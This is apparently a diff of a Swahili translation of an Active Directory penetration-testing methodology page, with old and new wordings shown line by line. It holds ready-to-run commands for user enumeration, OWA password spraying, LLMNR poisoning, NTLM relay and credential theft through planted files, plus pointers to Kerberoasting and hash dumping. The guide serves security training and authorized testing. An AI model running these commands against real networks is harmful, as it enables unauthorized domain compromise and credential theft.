Muundo wa **Active Directory** unajumuisha tabaka tatu kuu: **domains**, **trees**, na **forests**. **Domain** ni mkusanyiko wa objects, kama **users** au **devices**, zinazoshiriki database moja. **Trees** ni makundi ya domains haya yaliyounganishwa na muundo wa pamoja, na **forest** ni mkusanyiko wa trees nyingi, zilizounganishwa kupitia **trust relationships**, zikounda tabaka la juu kabisa la muundo wa shirika. Haki maalum za **access** na **communication** zinaweza kutengwa katika kila moja ya ngazi hizi.
Madhumuni muhimu ndani ya **Active Directory** ni:
Dhana muhimu ndani ya **Active Directory** ni pamoja na:
1. **Directory** Inahifadhi taarifa zote zinazohusu Active Directory objects.
2. **Object** Inaonyesha kiumbe ndani ya directory, ikijumuisha **users**, **groups**, au **shared folders**.
3. **Domain** Inafanya kazi kama kontena la directory objects, na inawezekana kwa domains nyingi kuishi ndani ya **forest**, kila moja ikiwa na mkusanyiko wake wa objects.
4. **Tree** Kikundi cha domains kinachoshiriki root domain moja.
5. **Forest** Safu ya juu kabisa ya muundo wa shirika katika Active Directory, inayojumuisha miti kadhaa zikiwa na **trust relationships** baina yao.
1. **Directory** Ina taarifa zote zinazohusiana na Active Directory objects.
2. **Object** Inaonyesha vitu ndani ya directory, ikiwa ni pamoja na **users**, **groups**, au **shared folders**.
3. **Domain** Hutoa chombo cha kuhifadhia directory objects, na inawezekana kuwa na domains nyingi ndani ya **forest**, kila moja ikiweka mkusanyiko wake wa objects.
4. **Tree** Makundi ya domains yanayoshiriki domain mzazi.
5. **Forest** Juu zaidi ya muundo wa shirika katika Active Directory, inayojumuisha trees kadhaa zenye **trust relationships** kati yao.
**Active Directory Domain Services (AD DS)** inajumuisha huduma mbalimbali muhimu kwa usimamizi wa katikati na mawasiliano ndani ya mtandao. Huduma hizi ni pamoja na:
**Active Directory Domain Services (AD DS)** inajumuisha huduma mbalimbali muhimu kwa usimamizi wa kati na mawasiliano ndani ya mtandao. Huduma hizi ni pamoja na:
1. **Domain Services** Inakusanya data kwa sehemu moja na kusimamia mwingiliano kati ya **users** na **domains**, ikiwa ni pamoja na **authentication** na **search**.
2. **Certificate Services** Inasimamia uundaji, ugawaji, na usimamizi wa **digital certificates** salama.
3. **Lightweight Directory Services** Inaunga mkono programu zilizo na directory kwa kupitia **LDAP protocol**.
4. **Directory Federation Services** Inatoa uwezo wa **single-sign-on** kuthibitisha watumiaji kwenye web applications mbalimbali kwa kikao kimoja.
5. **Rights Management** Inasaidia kulinda nyenzo za hakimiliki kwa kudhibiti usambazaji na matumizi yasiyoidhinishwa.
6. **DNS Service** Huduma muhimu kwa kutatua **domain names**.
1. **Domain Services** Inaleta uhifadhi wa data kwa njia ya kati na kusimamia mwingiliano kati ya **users** na **domains**, ikijumuisha **authentication** na uwezo wa **search**.
2. **Certificate Services** Inasimamia utengenezaji, usambazaji, na usimamizi wa **digital certificates** salama.
3. **Lightweight Directory Services** Inasaidia programu zilizo na directory kupitia **LDAP protocol**.
4. **Directory Federation Services** Inatoa uwezo wa **single-sign-on** ili kuthibitisha watumiaji kwenye web applications nyingi kwa kikao kimoja.
5. **Rights Management** Inasaidia kulinda vifaa vya hakimiliki kwa kudhibiti usambazaji na matumizi yasiyoidhinishwa.
6. **DNS Service** Muhimu kwa kutatua **domain names**.
Kwa maelezo zaidi angalia: [**TechTerms - Active Directory Definition**](https://techterms.com/definition/active_directory)
@ -34,25 +34,25 @@ Ili kujifunza jinsi ya **attack an AD** unahitaji kuelewa vizuri mchakato wa **K
## Cheat Sheet
Unaweza kuangalia mengi kwenye [https://wadcoms.github.io/](https://wadcoms.github.io) ili kupata muhtasari wa haraka wa amri ambazo unaweza kutekeleza ku-enumerate/exploit AD.
Unaweza kuchukua mengi kwenye [https://wadcoms.github.io/](https://wadcoms.github.io) ili kupata muhtasari wa haraka wa amri ambazo unaweza kuendesha ku-enumerate/exploit AD.
> [!WARNING]
> Kerberos communication **requires a full qualifid name (FQDN)** kwa kufanya vitendo. Ukijaribu kufikia mashine kwa anwani ya IP, **it'll use NTLM and not kerberos**.
> Kerberos communication **requires a full qualifid name (FQDN)** for performing actions. If you try to access a machine by the IP address, **it'll use NTLM and not kerberos**.
## Recon Active Directory (No creds/sessions)
Kama una ufikiaji wa mazingira ya AD lakini huna credentials/sessions unaweza:
Ikiwa unaweza tu kupata ufikiaji wa mazingira ya AD lakini huna credentials/sessions unaweza:
- **Pentest the network:**
- Piga skani mtandao, pata mashine na port zilizo wazi na jaribu **exploit vulnerabilities** au **extract credentials** kutoka kwao (kwa mfano, [printers could be very interesting targets](ad-information-in-printers.md)).
- Ku-orodha DNS kunaweza kutoa taarifa kuhusu server muhimu ndani ya domain kama web, printers, shares, vpn, media, n.k.
- Scan the network, pata machines na ports zilizo wazi na jaribu **exploit vulnerabilities** au **extract credentials** kutoka kwao (kwa mfano, [printers could be very interesting targets](ad-information-in-printers.md).
- Enumerating DNS inaweza kutoa taarifa kuhusu servers muhimu ndani ya domain kama web, printers, shares, vpn, media, n.k.
- `gobuster dns -d domain.local -t 25 -w /opt/Seclist/Discovery/DNS/subdomain-top2000.txt`
- Angalia [**Pentesting Methodology**](../../generic-methodologies-and-resources/pentesting-methodology.md) kwa maelezo zaidi juu ya jinsi ya kufanya haya.
- **Check for null and Guest access on smb services** (hii haitafanya kazi kwenye version za kisasa za Windows):
- Angalia [**Pentesting Methodology**](../../generic-methodologies-and-resources/pentesting-methodology.md) kwa maelezo zaidi kuhusu jinsi ya kufanya hili.
- **Check for null and Guest access on smb services** (hii haitafanya kazi kwenye toleo za kisasa za Windows):
- `enum4linux -a -u "" -p "" <DC IP> && enum4linux -a -u "guest" -p "" <DC IP>`
- `smbmap -u "" -p "" -P 445 -H <DC IP> && smbmap -u "guest" -p "" -P 445 -H <DC IP>`
- `smbclient -U '%' -L //<DC IP> && smbclient -U 'guest%' -L //`
- Mwongozo wa kina juu ya jinsi ya ku-enumerate SMB server unaweza kupatikana hapa:
- Mwongozo wa kina kuhusu jinsi ya ku-enumerate SMB server unaweza kupatikana hapa:
{{#ref}}
@ -61,7 +61,7 @@ Kama una ufikiaji wa mazingira ya AD lakini huna credentials/sessions unaweza:
- **Enumerate Ldap**
- `nmap -n -sV --script "ldap* and not brute" -p 389 <DC IP>`
- Mwongozo wa kina juu ya jinsi ya ku-enumerate LDAP unaweza kupatikana hapa (lipa **special attention to the anonymous access**):
- Mwongozo wa kina kuhusu jinsi ya ku-enumerate LDAP unaweza kupatikana hapa (lipa **special attention to the anonymous access**):
{{#ref}}
@ -70,20 +70,20 @@ Kama una ufikiaji wa mazingira ya AD lakini huna credentials/sessions unaweza:
- **Poison the network**
- Kusanya credentials kwa **impersonating services with Responder** (../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md)
- Pata ufikiaji wa host kwa **abusing the relay attack** (../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md#relay-attack)
- Kusanya credentials kwa **exposing fake UPnP services with evil-S** (../../generic-methodologies-and-resources/pentesting-network/spoofing-ssdp-and-upnp-devices.md)[**SDP**](https://medium.com/@nickvangilder/exploiting-multifunction-printers-during-a-penetration-test-engagement-28d3840d8856)
- Patia host ufikiaji kwa **abusing the relay attack** (../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md#relay-attack)
- Kusanya credentials kwa **exposing** [**fake UPnP services with evil-S**](../../generic-methodologies-and-resources/pentesting-network/spoofing-ssdp-and-upnp-devices.md)[**SDP**](https://medium.com/@nickvangilder/exploiting-multifunction-printers-during-a-penetration-test-engagement-28d3840d8856)
- [**OSINT**](https://book.hacktricks.wiki/en/generic-methodologies-and-resources/external-recon-methodology/index.html):
- Chota usernames/majina kutoka kwa nyaraka za ndani, mitandao ya kijamii, huduma (hasa web) ndani ya mazingira ya domain na pia zile zilizopo hadharani.
- Ukipata majina kamili ya wafanyakazi wa kampuni, unaweza kujaribu aina tofauti za AD **username conventions** ([**read this**](https://activedirectorypro.com/active-directory-user-naming-convention/)). Mienendo ya kawaida ni: _NameSurname_, _Name.Surname_, _NamSur_ (herufi 3 za kila moja), _Nam.Sur_, _NSurname_, _N.Surname_, _SurnameName_, _Surname.Name_, _SurnameN_, _Surname.N_, herufi 3 _random_ na namba 3 _random_ (abc123).
- Zana:
- Choma usernames/majina kutoka kwa nyaraka za ndani, mitandao ya kijamii, huduma (hasa web) ndani ya mazingira ya domain na pia kutoka kwa yaliyopo hadharani.
- Ikiwa utapata majina kamili ya wafanyakazi wa kampuni, unaweza kujaribu kanuni mbalimbali za AD **username conventions** ([**read this**](https://activedirectorypro.com/active-directory-user-naming-convention/)). Kanuni zinazoenea zaidi ni: _NameSurname_, _Name.Surname_, _NamSur_ (herufi 3 za kila jina), _Nam.Sur_, _NSurname_, _N.Surname_, _SurnameName_, _Surname.Name_, _SurnameN_, _Surname.N_, herufi 3 _random_ na namba 3 _random_ (abc123).
- Tools:
- [w0Tx/generate-ad-username](https://github.com/w0Tx/generate-ad-username)
- [urbanadventurer/username-anarchy](https://github.com/urbanadventurer/username-anarchy)
### Uorodheshaji wa watumiaji
### User enumeration
- **Anonymous SMB/LDAP enum:** Angalia kurasa za [**pentesting SMB**](../../network-services-pentesting/pentesting-smb/index.html) na [**pentesting LDAP**](../../network-services-pentesting/pentesting-ldap.md).
- **Kerbrute enum**: Wakati **invalid username is requested** server itajibu kwa kutumia msimbo wa hitilafu wa **Kerberos** _KRB5KDC_ERR_C_PRINCIPAL_UNKNOWN_, ikituruhusu kubaini kuwa username ilikuwa batili. **Valid usernames** zitatokea kwa AS-REP yenye **TGT** au hitilafu _KRB5KDC_ERR_PREAUTH_REQUIRED_, ikionyesha kuwa mtumiaji anahitajika kufanya pre-authentication.
- **No Authentication against MS-NRPC**: Kutumia auth-level = 1 (No authentication) dhidi ya kiolesura cha MS-NRPC (Netlogon) kwenye domain controllers. Mbinu inaita function `DsrGetDcNameEx2` baada ya kufunga MS-NRPC interface ili kukagua kama user au computer ipo bila credentials. Zana ya [NauthNRPC](https://github.com/sud0Ru/NauthNRPC) inatekeleza aina hii ya enumeration. Utafiti unaweza kupatikana [hapa](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/22190247/A-journey-into-forgotten-Null-Session-and-MS-RPC-interfaces.pdf)
- **Kerbrute enum**: Wakati **invalid username is requested** server itajibu kwa kutumia **Kerberos error** code _KRB5KDC_ERR_C_PRINCIPAL_UNKNOWN_, ikitupa nafasi ya kubaini kuwa username ilikuwa batili. **Valid usernames** zitapokea au TGT katika majibu ya **AS-REP** au error _KRB5KDC_ERR_PREAUTH_REQUIRED_, ikionyesha kuwa mtumiaji anaombiwa kufanya pre-authentication.
- **No Authentication against MS-NRPC**: Kutumia auth-level = 1 (No authentication) dhidi ya kiolesura cha MS-NRPC (Netlogon) kwenye domain controllers. Mbinu hii inaita function ya `DsrGetDcNameEx2` baada ya kubind MS-NRPC interface ili kukagua kama user au computer ipo bila credentials yoyote. Chombo cha [NauthNRPC](https://github.com/sud0Ru/NauthNRPC) kinatekeleza aina hii ya enumeration. Utafiti unaweza kupatikana [here](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/22190247/A-journey-into-forgotten-Null-Session-and-MS-RPC-interfaces.pdf)
```bash
./kerbrute_linux_amd64 userenum -d lab.ropnop.com --dc 10.10.10.10 usernames.txt #From https://github.com/ropnop/kerbrute/releases
@ -97,7 +97,7 @@ python3 nauth.py -t target -u users_file.txt #From https://github.com/sud0Ru/Nau
```
- **OWA (Outlook Web Access) Server**
Ikiwa umepata moja ya server hizi kwenye mtandao, unaweza pia kufanya **user enumeration against it**. Kwa mfano, unaweza kutumia zana [**MailSniper**](https://github.com/dafthack/MailSniper):
Ikiwa umepata moja ya seva hizi kwenye mtandao unaweza pia kufanya **user enumeration dhidi yake**. Kwa mfano, unaweza kutumia zana [**MailSniper**](https://github.com/dafthack/MailSniper):
```bash
ipmo C:\Tools\MailSniper\MailSniper.ps1
# Get info about the domain
@ -110,17 +110,17 @@ Invoke-PasswordSprayOWA -ExchHostname [ip] -UserList .\valid.txt -Password Summe
Get-GlobalAddressList -ExchHostname [ip] -UserName [domain]\[username] -Password Summer2021 -OutFile gal.txt
```
> [!WARNING]
> Unaweza kupata orodha za majina ya watumiaji katika [**this github repo**](https://github.com/danielmiessler/SecLists/tree/master/Usernames/Names) na hii ([**statistically-likely-usernames**](https://github.com/insidetrust/statistically-likely-usernames)).
> Unaweza kupata orodha za majina ya watumiaji kwenye [**this github repo**](https://github.com/danielmiessler/SecLists/tree/master/Usernames/Names) na hii ([**statistically-likely-usernames**](https://github.com/insidetrust/statistically-likely-usernames)).
>
> Hata hivyo, unapaswa kuwa na **majina ya watu wanaofanya kazi kampuni** kutoka hatua ya recon uliopaswa kufanya kabla ya hii. Ukiwa na jina la kwanza na la mwisho unaweza kutumia script ya [**namemash.py**](https://gist.github.com/superkojiman/11076951) kuunda majina ya watumiaji yanayowezekana ya halali.
> Hata hivyo, unapaswa kuwa na **majina ya watu wanaofanya kazi katika kampuni** kutoka hatua ya recon uliyopaswa kuwa umefanya kabla. Kwa jina na jina la ukoo unaweza kutumia script [**namemash.py**](https://gist.github.com/superkojiman/11076951) kuzalisha majina ya watumiaji yanayoweza kuwa halali.
### Kujua jina la mtumiaji mmoja au kadhaa
### Knowing one or several usernames
Sawa, kwa hiyo unajua tayari una jina la mtumiaji halali lakini hakuna nywila... Kisha jaribu:
Sawa, kwa hivyo unajua tayari una jina la mtumiaji halali lakini hakuna nywila... Kisha jaribu:
- [**ASREPRoast**](asreproast.md): Ikiwa mtumiaji **hana** sifa ya _DONT_REQ_PREAUTH_ unaweza **kuomba ujumbe wa AS_REP** kwa mtumiaji huyo ambao utaweka data iliyosenywa kwa mabadiliko ya nywila ya mtumiaji.
- [**Password Spraying**](password-spraying.md): Tujaribu nywila za **kawaida zaidi** kwa kila mtumiaji uliyekutwa, labda baadhi ya watumiaji wanatumia nywila mbaya (kumbuka sera ya nywila!).
- Kumbuka kwamba pia unaweza **kuspray OWA servers** ili kujaribu kupata ufikiaji wa server za barua za watumiaji.
- [**ASREPRoast**](asreproast.md): Ikiwa mtumiaji **haina** sifa _DONT_REQ_PREAUTH_ unaweza **kuomba ujumbe AS_REP** kwa mtumiaji huyo ambao utakuwa na baadhi ya data iliyosimbwa kwa utengenezaji wa nywila ya mtumiaji.
- [**Password Spraying**](password-spraying.md): Jaribu nywila zinazotumika zaidi kwa kila mmoja wa watumiaji uliogundua, labda mtumiaji mwingine anatumia nywila mbaya (kumbuka sera ya nywila!).
- Kumbuka kwamba pia unaweza **spray OWA servers** ili kujaribu kupata ufikiaji wa seva za barua za watumiaji.
{{#ref}}
@ -129,7 +129,7 @@ password-spraying.md
### LLMNR/NBT-NS Poisoning
Unaweza kupata baadhi ya challenge hashes za kukatwaza kwa ku-poison baadhi ya protocols za network:
Unaweza kupata baadhi ya challenge **hashes** za ku-crack kwa kufanya **poisoning** kwa baadhi ya protokoli za **network**:
{{#ref}}
@ -138,76 +138,76 @@ Unaweza kupata baadhi ya challenge hashes za kukatwaza kwa ku-poison baadhi ya p
### NTLM Relay
Ikiwa umeweza kuorodhesha Active Directory utakuwa na barua pepe zaidi na uelewa bora wa network. Unaweza kulazimisha NTLM [**relay attacks**](../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md#relay-attack) ili kupata ufikiaji wa mazingira ya AD.
Ikiwa umefanikiwa kuorodhesha Active Directory utakuwa na barua pepe zaidi na uelewa bora wa mtandao. Unaweza kujaribu kulazimisha NTLM [**relay attacks**](../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md#relay-attack) ili kupata ufikiaji wa mazingira ya AD.
### Steal NTLM Creds
Ikiwa unaweza **kupata ufikiaji wa PC au shares nyingine** kwa kutumia null au guest user unaweza **kuweka files** (kama SCF file) ambazo zikigusiwa zitafanya **NTLM authentication dhidi yako** ili uweze **kuiba** NTLM challenge na kuikata:
Iwapo unaweza **kupata access kwenye PC nyingine au shares** kwa kutumia **null or guest user** unaweza **kuweka files** (kama SCF file) ambazo mchakato wowote wa kuzipata unaweza **trigger an NTLM authentication against you**, ili uweze **steal** the **NTLM challenge** na kuikwepa/kuicrack:
{{#ref}}
../ntlm/places-to-steal-ntlm-creds.md
{{#endref}}
## Kuorodhesha Active Directory NA credentials/session
## Enumerating Active Directory WITH credentials/session
Kwa awamu hii unahitaji kuwa umeingilia credentials au session ya akaunti halali ya domain. Ikiwa una credentials halali au shell kama mtumiaji wa domain, kumbuka kwamba chaguzi zilizotolewa hapo awali bado zinaweza kutumika kuingilia watumiaji wengine.
Kwa hatua hii unahitaji kuwa umeharibu **credentials au session ya account halali ya domain.** Ikiwa una credentials halali au shell kama domain user, **kumbuka kwamba chaguzi zilizotajwa hapo awali bado ni njia za kumdhuru watumiaji wengine**.
Kabla ya kuanza enumeration iliyothibitishwa unapaswa kujua nini ni Kerberos double hop problem.
Kabla ya kuanza enumeration iliyothibitishwa unapaswa kuelewa tatizo la **Kerberos double hop problem.**
{{#ref}}
kerberos-double-hop-problem.md
{{#endref}}
### Uorodheshaji
### Enumeration
Kuwa umeingilia akaunti ni hatua kubwa ya kuanza kuingilia domain nzima, kwa sababu utaweza kuanza Active Directory Enumeration:
Kuwa umedhulumiwa akaunti ni **hatua kubwa ya kuanza kudhulumu domain nzima**, kwani utakuwa na uwezo wa kuanza **Active Directory Enumeration:**
Kuhusiana na [**ASREPRoast**](asreproast.md) sasa unaweza kupata watumiaji wote wanaoweza kuwa dhaifu, na kuhusu [**Password Spraying**](password-spraying.md) unaweza kupata **orodha ya majina yote ya watumiaji** na kujaribu nywila ya akaunti iliyovamiwa, nywila tupu na nywila mpya zenye matumaini.
Kuhusu [**ASREPRoast**](asreproast.md) sasa unaweza kupata kila mtumiaji anayehisiwa kuwa hatarini, na kuhusu [**Password Spraying**](password-spraying.md) unaweza kupata **orodha ya majina yote ya watumiaji** na kujaribu nywila za akaunti iliyodhulumiwa, nywila tupu na nywila mpya zinazotarajiwa.
- Unaweza kutumia [**CMD to perform a basic recon**](../basic-cmd-for-pentesters.md#domain-info)
- Unaweza pia kutumia [**powershell for recon**](../basic-powershell-for-pentesters/index.html) ambayo itakuwa isiyoonekana zaidi
- Pia unaweza [**use powerview**](../basic-powershell-for-pentesters/powerview.md) kupata taarifa za kina zaidi
- Zana nyingine nzuri ya recon katika Active Directory ni [**BloodHound**](bloodhound.md). Si **siri sana** (kutegemea mbinu za ukusanyaji unazotumia), lakini **ikiwa haujali** kuhusu hilo, inafaa kujaribu kabisa. Tafuta wapi watumiaji wanaweza RDP, pata njia za vikundi vingine, n.k.
- **Zana nyingine za otomatiki za uorodheshaji wa AD ni:** [**AD Explorer**](bloodhound.md#ad-explorer)**,** [**ADRecon**](bloodhound.md#adrecon)**,** [**Group3r**](bloodhound.md#group3r)**,** [**PingCastle**](bloodhound.md#pingcastle)**.**
- Pia unaweza kutumia [**powershell for recon**](../basic-powershell-for-pentesters/index.html) ambayo itakuwa ya kimya zaidi
- Pia unaweza [**use powerview**](../basic-powershell-for-pentesters/powerview.md) kukusanya taarifa za kina zaidi
- Zana nyingine nzuri kwa recon katika Active Directory ni [**BloodHound**](bloodhound.md). Si **stealthy sana** (kulingana na mbinu za ukusanyaji unazotumia), lakini **ikiwa haujali** kuhusu hilo, inastahili kujaribiwa. Tafuta wapi watumiaji wanaweza RDP, tafuta njia za kuingia kwenye makundi mengine, n.k.
- **Zana nyingine za kiotomatiki za AD enumeration ni:** [**AD Explorer**](bloodhound.md#ad-explorer)**,** [**ADRecon**](bloodhound.md#adrecon)**,** [**Group3r**](bloodhound.md#group3r)**,** [**PingCastle**](bloodhound.md#pingcastle)**.**
- [**DNS records of the AD**](ad-dns-records.md) kwani zinaweza kuwa na taarifa za kuvutia.
- Zana yenye GUI ambayo unaweza kutumia kuorodhesha directory ni **AdExplorer.exe** kutoka kwa **SysInternal** Suite.
- Pia unaweza kutafuta kwenye database ya LDAP kwa kutumia **ldapsearch** kutafuta credentials katika fields _userPassword_ & _unixUserPassword_, au hata kwa _Description_. cf. [Password in AD User comment on PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md#password-in-ad-user-comment) kwa mbinu nyingine.
- Ikiwa unatumia **Linux**, unaweza pia kuorodhesha domain kwa kutumia [**pywerview**](https://github.com/the-useless-one/pywerview).
- Unaweza pia kujaribu zana za otomatiki kama:
- Zana yenye GUI unaweza kutumia kuorodhesha directory ni **AdExplorer.exe** kutoka kwa **SysInternal** Suite.
- Pia unaweza kutafuta kwenye database ya LDAP kwa kutumia **ldapsearch** kutafuta credentials katika fields _userPassword_ & _unixUserPassword_, au hata katika _Description_. cf. [Password in AD User comment on PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md#password-in-ad-user-comment) kwa mbinu nyingine.
- Ikiwa unatumia **Linux**, unaweza pia kuorodhesha domain ukitumia [**pywerview**](https://github.com/the-useless-one/pywerview).
- Pia unaweza kujaribu zana za kiotomatiki kama:
- [**tomcarver16/ADSearch**](https://github.com/tomcarver16/ADSearch)
- [**61106960/adPEAS**](https://github.com/61106960/adPEAS)
- **Kuvua watumiaji wote wa domain**
- **Extracting all domain users**
Ni rahisi sana kupata majina yote ya watumiaji wa domain kutoka Windows (`net user /domain` ,`Get-DomainUser` or `wmic useraccount get name,sid`). Katika Linux, unaweza kutumia: `GetADUsers.py -all -dc-ip 10.10.10.110 domain.com/username` au `enum4linux -a -u "user" -p "password" <DC IP>`
Ni rahisi sana kupata majina yote ya watumiaji wa domain kutoka Windows (`net user /domain` ,`Get-DomainUser` au `wmic useraccount get name,sid`). Katika Linux, unaweza kutumia: `GetADUsers.py -all -dc-ip 10.10.10.110 domain.com/username` au `enum4linux -a -u "user" -p "password" <DC IP>`
> Hata kama sehemu hii ya Enumeration inaonekana ndogo hii ndilo sehemu muhimu zaidi ya yote. Fikia viungo (hasa ile ya cmd, powershell, powerview na BloodHound), jifunze jinsi ya kuorodhesha domain na fanya mazoezi hadi ujisikie uko tayari. Wakati wa assessment, hili litakuwa wakati muhimu wa kupata njia yako kuelekea DA au kuamua kwamba hakuna kinachoweza kufanywa.
> Hata kama sehemu ya Enumeration inaonekana fupi hii ndiyo sehemu muhimu zaidi ya yote. Fungua viungo (hasa ile za cmd, powershell, powerview na BloodHound), jifunze jinsi ya kuorodhesha domain na fanya mazoezi hadi ujiamini. Wakati wa assessment, hili ndilo kipindi muhimu kupata njia yako ya DA au kuamua kuwa hakuna cha kufanya.
### Kerberoast
Kerberoasting inahusisha kupata **TGS tickets** zinazotumiwa na services zinazohusishwa na akaunti za watumiaji na kuvunja usimbaji wake—ambao unategemea nywila za watumiaji—**offline**.
Kerberoasting inahusisha kupata **TGS tickets** zinazotumika na services zinazohusishwa na akaunti za watumiaji na ku-crack usimbaji wake—ambao unategemea nywila za watumiaji—**offline**.
Taarifa zaidi hapa:
Zaidi kuhusu hili katika:
{{#ref}}
kerberoast.md
{{#endref}}
### Muunganisho wa mbali (RDP, SSH, FTP, Win-RM, etc)
### Remote connexion (RDP, SSH, FTP, Win-RM, etc)
Mara utaempata credentials fulani unaweza kuangalia kama una ufikiaji wa mashine yoyote. Kwa kufanya hivyo, unaweza kutumia CrackMapExec kujaribu kujiunga kwenye server nyingi kwa protokoli tofauti, kulingana na port scan zako.
Mara tu unapopata baadhi ya credentials unaweza kuangalia kama una ufikiaji wa yoyote ya **machines**. Kwa hiyo, unaweza kutumia **CrackMapExec** kujaribu kuunganishwa kwenye seva kadhaa kwa protokoli tofauti, kulingana na skani zako za ports.
### Local Privilege Escalation
Ikiwa umeingilia credentials au session kama mtumiaji wa kawaida wa domain na una **ufikiaji** kwa mtumiaji huyu kwenye mashine yoyote katika domain inapaswa kujaribu kupata njia ya kuinua privileges kwa ndani na kuchimba kwa credentials. Hii ni kwa sababu ni kwa privileges za local administrator tu utakapoweza **dump hashes** za watumiaji wengine katika memory (LSASS) na kwa ndani (SAM).
Ikiwa umeharibu credentials au session kama domain user wa kawaida na una **access** kwa mtumiaji huyu kwenye **machine yoyote kwenye domain** unapaswa kujaribu kupata njia ya **escalate privileges locally and looting for credentials**. Hii ni kwa sababu ni kwa tu ukiwa na local administrator privileges ndipo utaweza **dump hashes of other users** kwenye memory (LSASS) na ndani ya mfumo (SAM).
Kuna ukurasa kamili katika kitabu hiki kuhusu [**local privilege escalation in Windows**](../windows-local-privilege-escalation/index.html) na [**checklist**](../checklist-windows-privilege-escalation.md). Pia, usisahau kutumia [**WinPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite).
### Current Session Tickets
Ni **nadra sana** utapata **tickets** kwenye mtumiaji wa sasa zitakazokuongezea ruhusa ya kupata rasilimali usizotarajia, lakini unaweza kuangalia:
Ni **sio rahisi** sana kwamba utapata **tickets** kwenye mtumiaji wa sasa ambazo zinakupa ruhusa ya kufikia rasilimali zisizotarajiwa, lakini unaweza kuangalia:
```bash
## List all tickets (if not admin, only current user tickets)
.\Rubeus.exe triage
@ -217,17 +217,17 @@ Ni **nadra sana** utapata **tickets** kwenye mtumiaji wa sasa zitakazokuongezea
```
### NTLM Relay
Ikiwa umefanikiwa kuorodhesha Active Directory utakuwa na **barua pepe zaidi na uelewa bora wa mtandao**. Huenda ukaweza kulazimisha NTLM [**relay attacks**](../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md#relay-attack)**.**
Ikiwa umefanikiwa kuorodhesha active directory utaweza kuwa na **barua pepe zaidi na uelewa bora wa mtandao**. Unaweza kuweza kulazimisha NTLM [**relay attacks**](../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md#relay-attack)**.**
### Looks for Creds in Computer Shares | SMB Shares
Sasa kwa kuwa una baadhi ya credentials za msingi unapaswa kuangalia kama unaweza **kupata** faili zozote **zinazovutia zinazoshirikiwa ndani ya AD**. Unaweza kufanya hivyo kwa mkono lakini ni kazi ya kuchosha na kurudia (na zaidi endapo utakuta mamia ya nyaraka unazopaswa kukagua).
Sasa kwa kuwa una baadhi ya basic credentials unapaswa kuangalia kama unaweza **kupata** faili zozote **zinazovutia zinazoshirikiwa ndani ya AD**. Unaweza kufanya hivyo kwa mikono lakini ni kazi ya kuchosha sana ya kurudia-rudia (hasa ikiwa utakuta mamia ya nyaraka unazohitaji kukagua).
[**Follow this link to learn about tools you could use.**](../../network-services-pentesting/pentesting-smb/index.html#domain-shared-folders-search)
[**Fuata kiungo hiki ili ujifunze kuhusu zana unazoweza kutumia.**](../../network-services-pentesting/pentesting-smb/index.html#domain-shared-folders-search)
### Steal NTLM Creds
Ikiwa unaweza **kupata PC au shares nyingine** unaweza **kuweka faili** (k.m. SCF file) ambazo zikifunguliwa zita**lazimisha uthibitishaji wa NTLM dhidi yako** ili uweze **kuiba** **NTLM challenge** na kuijaribu kuvunja:
Ikiwa unaweza **access other PCs or shares** unaweza **kuweka faili** (kama faili ya SCF) ambazo zikigundulika kwa namna yoyote zita**sababisha uthibitisho wa NTLM dhidi yako** ili uweze **kuiba** **NTLM challenge** ili kuichakua:
{{#ref}}
@ -236,7 +236,7 @@ Ikiwa unaweza **kupata PC au shares nyingine** unaweza **kuweka faili** (k.m. SC
### CVE-2021-1675/CVE-2021-34527 PrintNightmare
Udhaifu huu ulimruhusu mtumiaji yeyote aliyethibitishwa **kudhoofisha domain controller**.
Hitilafu hii iliruhusu mtumiaji yeyote aliyethibitishwa **kuvamia domain controller**.
{{#ref}}
@ -245,23 +245,23 @@ printnightmare.md
## Privilege escalation on Active Directory WITH privileged credentials/session
**For the following techniques a regular domain user is not enough, you need some special privileges/credentials to perform these attacks.**
**Kwa mbinu zifuatazo mtumiaji wa kawaida wa domain haitoshi, unahitaji baadhi ya privileges/credentials maalum ili kutekeleza mashambulizi haya.**
### Hash extraction
Kwa bahati nzuri umeweza **kupata udhibiti wa akaunti ya local admin** kwa kutumia [AsRepRoast](asreproast.md), [Password Spraying](password-spraying.md), [Kerberoast](kerberoast.md), [Responder](../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md) ikiwemo relaying, [EvilSSDP](../../generic-methodologies-and-resources/pentesting-network/spoofing-ssdp-and-upnp-devices.md), [escalating privileges locally](../windows-local-privilege-escalation/index.html).\
Kisha, ni wakati wa kutupa hashes zote zilizo kwenye memory na ndani ya mashine.\
[**Read this page about different ways to obtain the hashes.**](https://github.com/carlospolop/hacktricks/blob/master/windows-hardening/active-directory-methodology/broken-reference/README.md)
Tunatumai umefanikiwa **kupata udhibiti wa account ya local admin** kwa kutumia [AsRepRoast](asreproast.md), [Password Spraying](password-spraying.md), [Kerberoast](kerberoast.md), [Responder](../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md) including relaying, [EvilSSDP](../../generic-methodologies-and-resources/pentesting-network/spoofing-ssdp-and-upnp-devices.md), [escalating privileges locally](../windows-local-privilege-escalation/index.html).\
Kisha, ni wakati wa kutoa hashes zote kutoka kwenye memory na kwa ndani.\
